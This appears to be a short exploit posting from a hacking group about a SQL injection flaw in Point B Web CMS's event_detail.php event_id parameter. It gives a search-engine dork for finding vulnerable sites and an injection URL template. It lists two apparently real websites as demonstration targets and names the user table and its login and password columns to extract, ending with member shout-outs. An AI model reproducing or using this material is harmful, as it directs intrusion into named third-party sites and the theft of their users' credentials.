---------------IN THE NAME OF ALLAH----------------- Title: PBW CMS SQL Injection Vulnerability Discovered By : Ashiyane Digital Security Team Author : Ashiyane Digital Security Team Dork : intext:Powered by Point B Web CMS inurl:event_detail.php?event_id= Exploit : localhost/event_detail.php?event_id={SQL} DeMO: http://www.kcfund.org/event_detail.php?event_id=5 http://www.deanbackholm.com/event_detail.php?event_id=28 Users Table ----> USER_users Important Columns ------> user_id,login,password Tnx : Ali_Eagle - HaShoR - HidDeEn - Pr0grammer - hossein19123 - Rz04 - khatarnak And My Friends : M.R.S.CO - IrIsT - Tak.FaNaR - E2MA3N - black.king - Nafsh & ... ./Mr.Cicili